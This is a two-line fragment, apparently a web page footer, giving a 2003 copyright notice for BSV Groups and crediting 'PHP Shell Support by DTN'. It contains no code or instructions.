Copyright © 2003 BSV Groups

PHP Shell Support by DTN